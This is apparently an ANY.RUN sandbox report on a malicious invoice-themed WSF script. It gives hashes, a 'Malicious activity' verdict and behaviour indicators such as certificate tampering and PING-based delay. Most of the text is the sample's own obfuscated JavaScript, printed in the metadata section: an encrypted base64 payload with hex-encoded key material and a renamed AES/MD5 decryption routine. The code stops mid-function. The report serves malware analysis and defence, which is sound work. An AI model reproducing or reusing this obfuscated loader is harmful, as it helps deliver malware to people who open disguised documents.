analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Copy of Docs 68_204 INVO.WSF

Full analysis: https://app.any.run/tasks/703e4fe7-a2f6-4e5d-b365-6b6f562daddc
Verdict: Malicious activity
Analysis date: January 18, 2020, 10:42:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with no line terminators
MD5:

6E67786F68931599C4667F2CFEA164B9

SHA1:

9707EF2E939B8EDC87D33B0D416EDFB0F6AA70F3

SHA256:

0444FF998B75D9D53A5879087BAF542415D22271801A67B9F1D5BB851620E7BB

SSDEEP:

384:U1R5TB/kHcTbgdM0moo8WE6JH+xxKqnDmrWA2juutIm6m4:oiHwgS0mooHEPPNZAUuu0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes settings of System certificates

      • cscript.exe (PID: 3792)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 2240)
  • SUSPICIOUS

    • Creates files in the user directory

      • WScript.exe (PID: 716)
      • cscript.exe (PID: 2188)
      • cscript.exe (PID: 3792)
    • Executes scripts

      • cmd.exe (PID: 2632)
      • cscript.exe (PID: 2188)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 716)
      • cscript.exe (PID: 3792)
    • Application launched itself

      • cscript.exe (PID: 2188)
    • Adds / modifies Windows certificates

      • cscript.exe (PID: 3792)
  • INFO

    • Manual execution by user

      • explorer.exe (PID: 2488)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Generic XML (ASCII) (100)

EXIF

XMP

PackageJobScriptLanguage: JavaScript
PackageJobScript: var dtEDoFVfAj={eMUXrzTNkg:function(r){var a=NKBCmUHGeG.eazSwMHLnL.bOuFgvcTJj.xrkoWLGoQF({ukAoslEzPa:NKBCmUHGeG.VmLLEtCkRa.qdaKtPbCGD.eMUXrzTNkg("hXrI6VHc1882GaQ1AuutGmhjD5uM0PJiojBtfmfm and l0o784XktSXA4ufoMIOcfhacZ6B and 43ZP2g7i9omx9jRoxkaz3 are dSBNiJzm and dGnZI2r53FQQKnVV9JrIg4y are YHpuvZj5PGIf60zbJulqkLTkXa0Pi0g7f are zxB7TadXzr5z are niyD and Jd are SSiyKH2Y8M651YAdyRQ are SS7BkvzQY are G58nkmR are dRTGI15uZRkrDGJRKQbgxzG769QTL and A3awUdbMM92WCAVsvs1wfbJSkeNQpIaRHfQ479NujDAZKphWRO1cBULK73MONz are QztuL4InpAGRoAuuQ and 7W are are JKc1AwSwWB and JsLXxscVU6I6sDdvXWEpdER3yT9rn56VPTP37UC9Cfnfp9 and MC are QhXwArcEsxD1Xciv0T are 4CO and A1Mkkz1X8ccgdphF49tmsNm5vwP and F0RDAtlxs2PiY6H48ByJL5JFxsWFrXYzvPKGnUfLBffqm8ls3ZF5eljwVMB are bdql1i4f1hKV2OHqbxUA2CX5lKknoW4KdiftLHQZj2G2VTIyICK26i8Z and PJP1nmWw and T3D1gW and q7ycOz1mkI3 and F5zzLDc5EKgm3 and WoOaSei0KmzUpta6ldqoMx are d are D9 are nxlhHEHMewhYHlIw31WBUoDceiK8s413 and ccjnnpWtY6xleiMDJf8ovDhtjJyke3a1HNQYk0V8EjmfjHf are dzdcVxCB1QtVwiRvZvlCkMbLSt38Wwl4u are CRVMePBkVTXZ5s69 are vds4LTA0Aw4oVbNGBfZVqVo4wSwGyhSBoJEPm7255WpszOJ7SHBL9wZUCcYQzmLZpCDaNPTZLWAxa12OvEq2s11GcBIY28ttIHCSLdPhXEaGZZCiqM3XqbxQFkwAo are VD are jGTPtbjiDQGL and ZOqqPqzrGQGMFMwgVP are Avh and HekAaeWy1oq13PeM4sAyPovc4EPmhWErfVLSI2c8rilBAo9YeyGDwkAORVUGGe2UlUok are 2cAtJddwiW9tzIFWUu4t3gDUSWKjBDXwAJfcdbOVYDWj and KLNaPOx are lwJuy3UY9epmM1IfHbw59iibQZUYCHrJ5uWJAXhOWEtYtcJY1tf are qKR1aHaBapaX2umb0M6IXEPH2RFMmwcnuqC4Pu4owez25O8BZw5YCyq0pJSTH and t are k9aZonogWXx160PGgxC are ZjWCTjT8w5MBYf6Q6KHDrSQXwSLWvkCO9h5LuzZ1l4hOyoQ3k4IAcZ0p2acc4 and TJpShsBKIyXRo3vHmZJgZusOKnjMp5KnRiV977EpWu5DO04U and 7zWLYVPzGNm9cfsVrjpdXz6Skh4kJZ1a2hWbsQlFudse6x9t0KBd4PGcm4yri7IthM are CjBtJRCW3d0CmYoi8zhX are vszXndxds5 and UitIjtz57cEWJeYvOD and UaO1xfj and csD77yvaVDl5Bmai and 1J4YcQHmWHp0uzJxaV9i4ynKSWfdtW are 9yfSJhXpL are DRgYoC8yxRnqjqzqWCisyEULaImc9RkGg6mmReVEj2AbCTxcTostc are gBm are gsDWmpizifhK9WvSGbI7eTCoZ and S5OXEU3W9V1jnEUYCk4qVP3QuxAS70YZwbovrSkn0 and XARuvNTCbHpnhCD8hw7RYq552EpZCp3rQGyVlFfxc257U7rHF0PTqMOd are 5DwPkabGT and VgW and xncxz21Cj7wVHC73vlzqvV are PI1kGlPT are HaFaFLV4qutNvtielCQkZbGuFRBAXxA1Z3A1u2tuYrpCtISB68j2TtbFbxQnzGvr are vEKW are ejhfUcZ1CsRZRAmYAWl0dcYPsp8XKAhNZWJ are gzZPAjyxcL3nriE97oNhod4aOdNbTfNUKe3CphYnsdGdbGuWj0ruWVOh5egU8GL and MNdelWRFC0PczuJ9OFKpFyYDTbuvCwTEZLXb3ltKNU9mh4AHeuZb7vO6XOfevqnEgVNcWBmwgM1JDEnb and atz96zBvtYwKVTCcDTndnKayXO and lc82uRCy4lNm6YagZ9AsgsPdq1eqBIpxIQ8juHCVivA5PHtP2tidi and S3ezdj37qnjwqOrwnVTzNvZwvl4DL3B6yeepbyqD and p7grOkWHAS7mhC and eeDv895PEt6FGMntgKvjlbwBa423LLmDv74Ix7NRcCct68SGfkChXKoYck3dMozwB8Ss3fJ2FmhaiO5GttqihfWq9NR3SRusXCAiSh5uK3okEXrtmm04ZUH8ldOTKd28EkhPvSmg7r are lBCPKt6O and k5mgs4eiqeVb0KxeFczXBCRi89CPNutFH1yK86 are H0bdXyKZoIXtbec4evOybGVqh028kw5nxrxIUcLVweByg are VN12HhUOR5cqaU0VdQRKFEZ are 7mlIAxdxywORzGlC4GLaC4ikdpMQa23 and 6vKXaZF24NqKEJ1VdKK6medjdeaqjcZkjOr7oVf4V6OocG1WIpevZMJvWX5ZsEJd94ZviwVKOvqLUocAtmBaZeO5rQM1TtLz4wG and t and vIRJkjxaja2dDQ5KyhWKlDo3TbdhZ7AT0NnZF0FPnq3RcgUvAUrzvuRuvJKBVZ6v2h are b21OGY and yLWLxIi9Ka5S9oOt and and dkZQZmNcoFM4BuGaPS3efXa6PEGd0jGjZKF5TDOMO1dePbDtoGkdy8Z6tfzuGIC3SH9hl7EbcTSAkvns7d3jcru8 and igPxkapNqIr2s7Qv3Qt8hpJeMBwx1ILC1I are rC7fjBR1wYv7lsBJov8kL03A5jDoyZvEouf2V and fzHMLXmAuGb and R6MnuyUUBOppM36jESTcfPNYjx and NlidUMIn8ijozFytVfkt4wAsq90MbAlcso2y9D are EpiArc2N708N14qL5 are pPRCJb6UpRUJn1MI38DE1hjgzWlIeyvcPwvTWbqGubBJP6DIQJ9Avy are nvijYBfPAuXIkH4IS and 0yPyFcdt are fswfPqt2E4DKqhCm5kNVMF4BThsNauwzeSS2lxEr and PWu7MvY9M3wuGvj3EW0yZq5CM3Gm6R7gl9 are bST are IyhGwDM4bqFN0bqGgeqlgJzQqFFPA and wnQ1Km0EFUYW0biVj4anSrDd3JWtJ are and NZcCeL5MXfHX8lBEQLquksAq and fBxCBoGht11mZN4sJX5o9CTROWZLgH67WxukBYJeykngNcO1rpRSFsJ5w2Zw5GK8nfLKF3tdzig3X7HMPdbgx75azouagQmGcHaE are QItF0z2JYxfOjdhQPmElhBsdXtTxfplPb8Cts02gafq7KExoSPK991ca1LVwKnqY8hSRL7Ox are EmO2c1epWsKEoj6DcA are 3jZ0GOmDRGSWZLXJWu4ytMXc5itOKFpfwzUlGuHKdDx are YDfz3gDfhgp3jYZlatnlzYtvm1DTw43dLHx2UAxm8CCE1Ek1vUExdKtjQrIM2BWjjzd0Mw81CxLr4zjsGjv4axtCU22jWCM1PfWPygVzx02zxEewGzmz7E0qbeQm6CQrn337r279rPhBYd0i1uX1ewzKJOEuETA3pPBIw2gJyHneZ3qSUOydPRCDtQ3E59idpW and XYO9LskAb8GIRBfRfFCmxrn1yTODUyoNiFE01 are MiFbaXzmJlQxHwmhE9UbAMx are BNF0c1yEPphQu39labdWbf5WoswYtqvwOQlEUxugSXDIh3McCOgD3hALEgrJZ9nrM01oOxnw88cA31LZpkmeDjYCMR and XOzWLRQ6fXReP and wZ4u are and ps7GYfltz2kiEmfq2zzg2bNsH and Mwa7tnyNrKK9Pqc are bsQyqg3H3AAEB6AtGfk1 are vnI3dDrlxEI89T3fgpH4cEmym0rEFPSF77bNk9 are yjNRoc0PlD8Y28T8sxkYhmOMVPm5BgVk6hYKYkhARJYNJ0mGGwOdDsqJ1 and P8CyHDuRehNfZWsGzG and Eqr8Hy4fZMfqt are jUr7lyxbEfVpbJFVLgrOZbnec are hZ and adj6XSZs3Lupb7bTcZYTlfL8yD6SBSUD1mf8ILWoZz7Wl and MCPLMzsHuK4C5sV1IYWES76atP5dzfbREIMPZc6ZBce3Eud4MQdxuZ789BVn0q5YCfLybs are p0sDE31PLbROC25LBlIZaJGNacqL9A0Nb2iyEWTmwrxclBOrMwMnISCh2WVQ3foO4q1mRqQ0l6HrhYLe5oVnqb7aVTt7jNWHYbgqAgNdG6mrACztTrNzonc65poVjP5mj7B4vmLT are qZinSukistDRUngoi4eGrVRKOxlB92jJjeRBw14btD1WM are Xl0u3wsVONebFdGBJ6Chro60Ynoc are BarDNsIPtNiP4MJE0TsxINOpoI9ZYbgjgI2PfDsrPyEibFAQxRnWrR7EIeb and Le5S45ic948npMHeHwbVC7ZIogPSRYm are 5o0crU5Zg2EK2XzN5NzfjWyKOvzzaGwqMGJjo5GkpuhGpHjR0zuaXW are 6A3J3tUKDSG9 are 2 and 870Ycg9ghgVBgWCJBFYuAN74BJgZEVk4Db3jUUhz4vEkyCIR6dEjaCXpNa1kugicsogD4U2Qu49SnrsAUKbpyshyBIm6kc2r4dU4SxQAwFBuRinrqUMbgYFAm8leGfi6O3StOy84czlNpyGxzQByMLwYIRhp6tb0OY9oBbdOQS and 8i4G and v70kkWCBDqRsmBFIz4iVe5HcwAaabiU6Fl8RKlJvGUfiv3zStwFqXvctpcq63cfgCbYpQJuU and eoTTdl and DuKNrQkm9zD0zxBpB18eLeQnIKA are and tFmMIiID6JPtEeJQPlfcIj5z1CvBS794ssrrTng97G and BYMQMF5Atblixch9pQPNxyVKqBt4q8TPEZo and YXwN7M6L70O8UarPXLue8JurQ7U9ccn5 and pZT and 2rx6tdVG0oqo1zhAfVexenrWasd9hhPnTyKEbc1TDXVboJCs5VbRxbOTIO45UDtz are 97 and Fs95mp9OwL6wTebE0P8 and L2vVnjWftpBmNIc1pFZGNrAgBmAZL7qpayzF6sS34rqJenJnyVigYTcgbbqMtjs1TZWzIsoniMXuCBs9sH2R5YE0O8B0t8zEu27hmF are BdgTEWs3ufga2PmeuGZBJvt1pPVjdkHUZ56TiRBjTzhic are Mv5WmwjBogQ4Gi and kRCYULmBRnZ and aSSXbXA9T9B0NfgU2VFMJWbFFAwhonZL9J34K0btsmR are Seuv8 and I3J6oxsfyH3gX09fyaVzzktwVqUJWe4jesChFC5youtY6X and 7AHeHm87dHdWzVGJb52Kn2q1qi2jRQv74ggK84jfvd0batVJEIvwAyYnE0tWMdlgZj and 8HH3 and ziJOq4pYG".replace(/\sand\s/g,"+").replace(/\sare\s/g,"/"))});return a.yLIlTYUEdC=NKBCmUHGeG.VmLLEtCkRa.lDGQhhAcvH.eMUXrzTNkg("\x35\x36\x33\x66\x64\x62\x35\x37\x66\x65\x62\x61\x30\x38\x33\x39\x31\x37\x35\x65\x65\x31\x65\x62\x62\x33\x33\x64\x63\x34\x62\x65"),a.gwiUkDQFxZ=NKBCmUHGeG.VmLLEtCkRa.lDGQhhAcvH.eMUXrzTNkg("\x36\x30\x34\x37\x61\x37\x62\x38\x65\x32\x30\x66\x39\x37\x30\x37"),a}},NKBCmUHGeG=NKBCmUHGeG||function(s){function v(){}var r={},a=r.eazSwMHLnL={},t=a.PWMbKrXNBt={LBLCJIeRxa:function(r){v.prototype=this;var a=new v;return r&&a.GYRmHplwNA(r),a.hasOwnProperty("VTADyRvtZq")||(a.VTADyRvtZq=function(){a.$super.VTADyRvtZq.apply(this,arguments)}),(a.VTADyRvtZq.prototype=a).$super=this,a},xrkoWLGoQF:function(){var r=this.LBLCJIeRxa();return r.VTADyRvtZq.apply(r,arguments),r},VTADyRvtZq:function(){},GYRmHplwNA:function(r){for(var a in r)r.hasOwnProperty(a)&&(this[a]=r[a]);r.hasOwnProperty("toString")&&(this.toString=r.toString)},CUrjqyrzhF:function(){return this.VTADyRvtZq.prototype.LBLCJIeRxa(this)}},u=a.KVwhYRmAAZ=t.LBLCJIeRxa({VTADyRvtZq:function(r,a){r=this.eZRNeHSVmZ=r||[],this.KlwuiHJXBf=null!=a?a:4*r.length},toString:function(r){return(r||i).BmCiUFCvRY(this)},SYgJPZTcjh:function(r){var a=this.eZRNeHSVmZ,v=r.eZRNeHSVmZ,t=this.KlwuiHJXBf;if(r=r.KlwuiHJXBf,this.PFqgzhjvEl(),t%4)for(var n=0;n<r;n++)a[t+n>>>2]|=(v[n>>>2]>>>24-n%4*8&255)<<24-(t+n)%4*8;else if(65535<v.length)for(n=0;n<r;n+=4)a[t+n>>>2]=v[n>>>2];else a.push.apply(a,v);return this.KlwuiHJXBf+=r,this},PFqgzhjvEl:function(){var r=this.eZRNeHSVmZ,a=this.KlwuiHJXBf;r[a>>>2]&=4294967295<<32-a%4*8,r.length=s.ceil(a/4)},CUrjqyrzhF:function(){var r=t.CUrjqyrzhF.call(this);return r.eZRNeHSVmZ=this.eZRNeHSVmZ.slice(0),r},CqlccWGqHP:function(r){for(var a=[],v=0;v<r;v+=4)a.push(4294967296*s.CqlccWGqHP()|0);return new u.VTADyRvtZq(a,r)}}),n=r.VmLLEtCkRa={},i=n.lDGQhhAcvH={BmCiUFCvRY:function(r){var a=r.eZRNeHSVmZ;r=r.KlwuiHJXBf;for(var v=[],t=0;t<r;t++){var n=a[t>>>2]>>>24-t%4*8&255;v.push((n>>>4).toString(16)),v.push((15&n).toString(16))}return v.join("")},eMUXrzTNkg:function(r){for(var a=r.length,v=[],t=0;t<a;t+=2)v[t>>>3]|=parseInt(r.substr(t,2),16)<<24-t%8*4;return new u.VTADyRvtZq(v,a/2)}},o=n.WfDUQhNjUK={BmCiUFCvRY:function(r){var a=r.eZRNeHSVmZ;r=r.KlwuiHJXBf;for(var v=[],t=0;t<r;t++)v.push(String.fromCharCode(a[t>>>2]>>>24-t%4*8&255));return v.join("")},eMUXrzTNkg:function(r){for(var a=r.length,v=[],t=0;t<a;t++)v[t>>>2]|=(255&r.charCodeAt(t))<<24-t%4*8;return new u.VTADyRvtZq(v,a)}},h=n.IBEHHawlRa={BmCiUFCvRY:function(r){try{return decodeURIComponent(escape(o.BmCiUFCvRY(r)))}catch(r){throw Error("Malformed UTF-8 data")}},eMUXrzTNkg:function(r){return o.eMUXrzTNkg(unescape(encodeURIComponent(r)))}},e=a.UlEVySMEJs=t.LBLCJIeRxa({FHfjEzPpJw:function(){this.vIeNauyfgj=new u.VTADyRvtZq,this.GESeKdKkDW=0},gyZqefjfbb:function(r){"string"==typeof r&&(r=h.eMUXrzTNkg(r)),this.vIeNauyfgj.SYgJPZTcjh(r),this.GESeKdKkDW+=r.KlwuiHJXBf},RKIgZniAQd:function(r){var a=this.vIeNauyfgj,v=a.eZRNeHSVmZ,t=a.KlwuiHJXBf,n=this.xWmTEJzxuk,i=t/(4*n);if(r=(i=r?s.ceil(i):s.max((0|i)-this.jreIRpNpkc,0))*n,t=s.min(4*r,t),r){for(var o=0;o<r;o+=n)this.UhGEEtisBv(v,o);o=v.splice(0,r),a.KlwuiHJXBf-=t}return new u.VTADyRvtZq(o,t)},CUrjqyrzhF:function(){var r=t.CUrjqyrzhF.call(this);return r.vIeNauyfgj=this.vIeNauyfgj.CUrjqyrzhF(),r},jreIRpNpkc:0});a.bNRyvxysqf=e.LBLCJIeRxa({tAjRFOtDJa:t.LBLCJIeRxa(),VTADyRvtZq:function(r){this.tAjRFOtDJa=this.tAjRFOtDJa.LBLCJIeRxa(r),this.FHfjEzPpJw()},FHfjEzPpJw:function(){e.FHfjEzPpJw.call(this),this.VDrUSIMlYF()},xizcXRaCSF:function(r){return this.gyZqefjfbb(r),this.RKIgZniAQd(),this},fZuooDWaQu:function(r){return r&&this.gyZqefjfbb(r),this.jnfmItvFqw()},xWmTEJzxuk:16,bvTMfLRMFS:function(v){return function(r,a){return new v.VTADyRvtZq(a).fZuooDWaQu(r)}},FdkaCDLqCX:function(v){return function(r,a){return new c.HMAC.VTADyRvtZq(v,a).fZuooDWaQu(r)}}});var c=r.RfuCsvEMIV={};return r}(Math);!function(){var r=NKBCmUHGeG,u=r.eazSwMHLnL.KVwhYRmAAZ;r.VmLLEtCkRa.qdaKtPbCGD={BmCiUFCvRY:function(r){var a=r.eZRNeHSVmZ,v=r.KlwuiHJXBf,t=this.KraWJNWdbF;r.PFqgzhjvEl(),r=[];for(var n=0;n<v;n+=3)for(var i=(a[n>>>2]>>>24-n%4*8&255)<<16|(a[n+1>>>2]>>>24-(n+1)%4*8&255)<<8|a[n+2>>>2]>>>24-(n+2)%4*8&255,o=0;o<4&&n+.75*o<v;o++)r.push(t.charAt(i>>>6*(3-o)&63));if(a=t.charAt(64))for(;r.length%4;)r.push(a);return r.join("")},eMUXrzTNkg:function(r){var a=r.length,v=this.KraWJNWdbF;!(t=v.charAt(64))||-1!=(t=r.indexOf(t))&&(a=t);for(var t=[],n=0,i=0;i<a;i++)if(i%4){var o=v.indexOf(r.charAt(i-1))<<i%4*2,s=v.indexOf(r.charAt(i))>>>6-i%4*2;t[n>>>2]|=(o|s)<<24-n%4*8,n++}return u.xrkoWLGoQF(t,n)},KraWJNWdbF:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="}}(),function(i){function m(r,a,v,t,n,i,o){return((r=r+(a&v|~a&t)+n+o)<<i|r>>>32-i)+a}function A(r,a,v,t,n,i,o){return((r=r+(a&t|v&~t)+n+o)<<i|r>>>32-i)+a}function C(r,a,v,t,n,i,o){return((r=r+(a^v^t)+n+o)<<i|r>>>32-i)+a}function O(r,a,v,t,n,i,o){return((r=r+(v^(a|~t))+n+o)<<i|r>>>32-i)+a}for(var r=NKBCmUHGeG,a=(t=r.eazSwMHLnL).KVwhYRmAAZ,v=t.bNRyvxysqf,t=r.RfuCsvEMIV,M=[],n=0;n<64;n++)M[n]=4294967296*i.abs(i.sin(n+1))|0;t=t.lLteiQqIHF=v.LBLCJIeRxa({VDrUSIMlYF:function(){this.eSduUVnIBD=new a.VTADyRvtZq([1732584193,4023233417,2562383102,271733878])},UhGEEtisBv:function(r,a){for(var v=0;v<16;v++){var t=r[o=a+v];r[o]=16711935&(t<<8|t>>>24)|4278255360&(t<<24|t>>>8)}v=this.eSduUVnIBD.eZRNeHSVmZ;var n,i,o=r[a+0],s=(t=r[a+1],r[a+2]),u=r[a+3],h=r[a+4],e=r[a+5],c=r[a+6],f=r[a+7],l=r[a+8],p=r[a+9],g=r[a+10],d=r[a+11],k=r[a+12],y=r[a+13],w=r[a+14],S=r[a+15],_=v[0],B=O(B=O(B=O(B=O(B=C(B=C(B=C(B=C(B=A(B=A(B=A(B=A(B=m(B=m(B=m(B=m(B=v[1],i=m(i=v[2],n=m(n=v[3],_=m(_,B,i,n,o,7,M[0]),B,i,t,12,M[1]),_,B,s,17,M[2]),n,_,u,22,M[3]),i=m(i,n=m(n,_=m(_,B,i,n,h,7,M[4]),B,i,e,12,M[5]),_,B,c,17,M[6]),n,_,f,22,M[7]),i=m(i,n=m(n,_=m(_,B,i,n,l,7,M[8]),B,i,p,12,M[9]),_,B,g,17,M[10]),n,_,d,22,M[11]),i=m(i,n=m(n,_=m(_,B,i,n,k,7,M[12]),B,i,y,12,M[13]),_,B,w,17,M[14]),n,_,S,22,M[15]),i=A(i,n=A(n,_=A(_,B,i,n,t,5,M[16]),B,i,c,9,M[17]),_,B,d,14,M[18]),n,_,o,20,M[19]),i=A(i,n=A(n,_=A(_,B,i,n,e,5,M[20]),B,i,g,9,M[21]),_,B,S,14,M[22]),n,_,h,20,M[23]),i=A(i,n=A(n,_=A(_,B,i,n,p,5,M[24]),B,i,w,9,M[25]),_,B,u,14,M[26]),n,_,l,20,M[27]),i=A(i,n=A(n,_=A(_,B,i,n,y,5,M[28]),B,i,s,9,M[29]),_,B,f,14,M[30]),n,_,k,20,M[31]),i=C(i,n=C(n,_=C(_,B,i,n,e,4,M[32]),B,i,l,11,M[33]),_,B,d,16,M[34]),n,_,w,23,M[35]),i=C(i,n=C(n,_=C(_,B,i,n,t,4,M[36]),B,i,h,11,M[37]),_,B,f,16,M[38]),n,_,g,23,M[39]),i=C(i,n=C(n,_=C(_,B,i,n,y,4,M[40]),B,i,o,11,M[41]),_,B,u,16,M[42]),n,_,c,23,M[43]),i=C(i,n=C(n,_=C(_,B,i,n,p,4,M[44]),B,i,k,11,M[45]),_,B,S,16,M[46]),n,_,s,23,M[47]),i=O(i,n=O(n,_=O(_,B,i,n,o,6,M[48]),B,i,f,10,M[49]),_,B,w,15,M[50]),n,_,e,21,M[51]),i=O(i,n=O(n,_=O(_,B,i,n,k,6,M[52]),B,i,u,10,M[53]),_,B,g,15,M[54]),n,_,t,21,M[55]),i=O(i,n=O(n,_=O(_,B,i,n,l,6,M[56]),B,i,S,10,M[57]),_,B,c,15,M[58]),n,_,y,21,M[59]),i=O(i,n=O(n,_=O(_,B,i,n,h,6,M[60]),B,i,d,10,M[61]),_,B,s,15,M[62]),n,_,p,21,M[63]);v[0]=v[0]+_|0,v[1]=v[1]+B|0,v[2]=v[2]+i|0,v[3]=v[3]+n|0},jnfmItvFqw:function(){var r=this.vIeNauyfgj,a=r.eZRNeHSVmZ,v=8*this.GESeKdKkDW,t=8*r.KlwuiHJXBf;a[t>>>5]|=128<<24-t%32;var n=i.floor(v/4294967296);for(a[15+(t+64>>>9<<4)]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8),a[14+(t+64>>>9<<4)]=16711935&(v<<8|v>>>24)|4278255360&(v<<24|v>>>8),r.KlwuiHJXBf=4*(a.length+1),this.RKIgZniAQd(),a=(r=this.eSduUVnIBD).eZRNeHSVmZ,v=0;v<4;v++)t=a[v],a[v]=16711935&(t<<8|t>>>24)|4278255360&(t<<24|t>>>8);return r},CUrjqyrzhF:function(){var r=v.CUrjqyrzhF.call(this);return r.eSduUVnIBD=this.eSduUVnIBD.CUrjqyrzhF(),r}}),r.lLteiQqIHF=v.bvTMfLRMFS(t),r.HmaclLteiQqIHF=v.FdkaCDLqCX(t)}(Math),function(){var r,a=NKBCmUHGeG,v=(r=a.eazSwMHLnL).PWMbKrXNBt,h=r.KVwhYRmAAZ,t=(r=a.RfuCsvEMIV).clGbCUkVRF=v.LBLCJIeRxa({tAjRFOtDJa:v.LBLCJIeRxa({KzfiCbrnue:4,qwYZePKuGS:r.lLteiQqIHF,qqfapNqQKP:1}),VTADyRvtZq:function(r){this.tAjRFOtDJa=this.tAjRFOtDJa.LBLCJIeRxa(r)},IOaZMzuUuc:function(r,a){for(var v=(o=this.tAjRFOtDJa).qwYZePKuGS.xrkoWLGoQF(),t=h.xrkoWLGoQF(),n=t.eZRNeHSVmZ,i=o.KzfiCbrnue,o=o.qqfapNqQKP;n.length<i;){s&&v.xizcXRaCSF(s);var s=v.xizcXRaCSF(r).fZuooDWaQu(a);v.FHfjEzPpJw();for(var u=1;u<o;u++)s=v.fZuooDWaQu(s),v.FHfjEzPpJw();t.SYgJPZTcjh(s)}return t.KlwuiHJXBf=4*i,t}});a.clGbCUkVRF=function(r,a,v){return t.xrkoWLGoQF(v).IOaZMzuUuc(r,a)}}(),NKBCmUHGeG.eazSwMHLnL.SQaxnzYskL||function(){var r=(f=NKBCmUHGeG).eazSwMHLnL,a=r.PWMbKrXNBt,o=r.KVwhYRmAAZ,v=r.UlEVySMEJs,t=f.VmLLEtCkRa.qdaKtPbCGD,n=f.RfuCsvEMIV.clGbCUkVRF,i=r.SQaxnzYskL=v.LBLCJIeRxa({tAjRFOtDJa:a.LBLCJIeRxa(),DFaQKSSpxd:function(r,a){return this.xrkoWLGoQF(this.XNQsMuyROa,r,a)},YTPIvGNUof:function(r,a){return this.xrkoWLGoQF(this.puxhpNLqoe,r,a)},VTADyRvtZq:function(r,a,v){this.tAjRFOtDJa=this.tAjRFOtDJa.LBLCJIeRxa(v),this.hLGIpQMIyO=r,this.ujgXpnylwb=a,this.FHfjEzPpJw()},FHfjEzPpJw:function(){v.FHfjEzPpJw.call(this),this.VDrUSIMlYF()},BirFVFlKOB:function(r){return this.gyZqefjfbb(r),this.RKIgZniAQd()},fZuooDWaQu:function(r){return r&&this.gyZqefjfbb(r),this.jnfmItvFqw()},KzfiCbrnue:4,XRkvWggaQX:4,XNQsMuyROa:1,puxhpNLqoe:2,bvTMfLRMFS:function(t){return{PYbsXnmtJA:function(r,a,v){return("string"==typeof a?l:c).PYbsXnmtJA(t,r,a,v)},IXjSHElPSb:function(r,a,v){return("string"==typeof a?l:c).IXjSHElPSb(t,r,a,v)}}}});r.StreamSQaxnzYskL=i.LBLCJIeRxa({jnfmItvFqw:function(){return this.RKIgZniAQd(!0)},xWmTEJzxuk:1});function s(r,a,v){var t=this.bQaMMvenyc;t?this.bQaMMvenyc=void 0:t=this.MAJkuGovvM;for(var n=0;n<v;n++)r[a+n]^=t[n]}var u=f.jspwHIXzmY={},h=(r.BlockSQaxnzYskLMode=a.LBLCJIeRxa({DFaQKSSpxd:function(r,a){return this.vEQkSvUxdn.xrkoWLGoQF(r,a)},YTPIvGNUof:function(r,a){return this.PtyIomnbVQ.xrkoWLGoQF(r,a)},VTADyRvtZq:function(r,a){this.GITGGidlRh=r,this.bQaMMvenyc=a}})).LBLCJIeRxa();h.vEQkSvUxdn=h.LBLCJIeRxa({BirFVFlKOBBlock:function(r,a){var v=this.GITGGidlRh,t=v.xWmTEJzxuk;s.call(this,r,a,t),v.PYbsXnmtJABlock(r,a),this.MAJkuGovvM=r.slice(a,a+t)}}),h.PtyIomnbVQ=h.LBLCJIeRxa({BirFVFlKOBBlock:function(r,a){var v=this.GITGGidlRh,t=v.xWmTEJzxuk,n=r.slice(a,a+t);v.IXjSHElPSbBlock(r,a),s.call(this,r,a,t),this.MAJkuGovvM=n}}),u=u.HoghRMehux=h,h=(f.DNsMXJjxnO={}).Pkcs7={DNsMXJjxnO:function(r,a){for(var v,t=(v=(v=4*a)-r.KlwuiHJXBf%v)<<24|v<<16|v<<8|v,n=[],i=0;i<v;i+=4)n.push(t);v=o.xrkoWLGoQF(n,v),r.SYgJPZTcjh(v)},unDNsMXJjxnO:function(r){r.KlwuiHJXBf-=255&r.eZRNeHSVmZ[r.KlwuiHJXBf-1>>>2]}},r.BlockSQaxnzYskL=i.LBLCJIeRxa({tAjRFOtDJa:i.tAjRFOtDJa.LBLCJIeRxa({jspwHIXzmY:u,ovnGHahhRt:h}),FHfjEzPpJw:function(){i.FHfjEzPpJw.call(this);var r=(a=this.tAjRFOtDJa).yLIlTYUEdC,a=a.jspwHIXzmY;if(this.hLGIpQMIyO==this.XNQsMuyROa)var v=a.DFaQKSSpxd;else v=a.YTPIvGNUof,this.jreIRpNpkc=1;this._jspwHIXzmY=v.call(a,this,r&&r.eZRNeHSVmZ)},UhGEEtisBv:function(r,a){this._jspwHIXzmY.BirFVFlKOBBlock(r,a)},jnfmItvFqw:function(){var r=this.tAjRFOtDJa.ovnGHahhRt;if(this.hLGIpQMIyO==this.XNQsMuyROa){r.DNsMXJjxnO(this.vIeNauyfgj,this.xWmTEJzxuk);var a=this.RKIgZniAQd(!0)}else a=this.RKIgZniAQd(!0),r.unDNsMXJjxnO(a);return a},xWmTEJzxuk:4});var e=r.bOuFgvcTJj=a.LBLCJIeRxa({VTADyRvtZq:function(r){this.GYRmHplwNA(r)},toString:function(r){return(r||this.HCvDohrvxQ).BmCiUFCvRY(this)}}),c=(u=(f.XCoXBEMuLA={}).pMgBTzEVtE={BmCiUFCvRY:function(r){var a=r.ukAoslEzPa;return((r=r.gwiUkDQFxZ)?o.xrkoWLGoQF([1398893684,1701076831]).SYgJPZTcjh(r).SYgJPZTcjh(a):a).toString(t)},eMUXrzTNkg:function(r){var a=(r=t.eMUXrzTNkg(r)).eZRNeHSVmZ;if(1398893684==a[0]&&1701076831==a[1]){var v=o.xrkoWLGoQF(a.slice(2,4));a.splice(0,4),r.KlwuiHJXBf-=16}return e.xrkoWLGoQF({ukAoslEzPa:r,salt:v})}},r.SerializableSQaxnzYskL=a.LBLCJIeRxa({tAjRFOtDJa:a.LBLCJIeRxa({XCoXBEMuLA:u}),PYbsXnmtJA:function(r,a,v,t){t=this.tAjRFOtDJa.LBLCJIeRxa(t);var n=r.DFaQKSSpxd(v,t);return 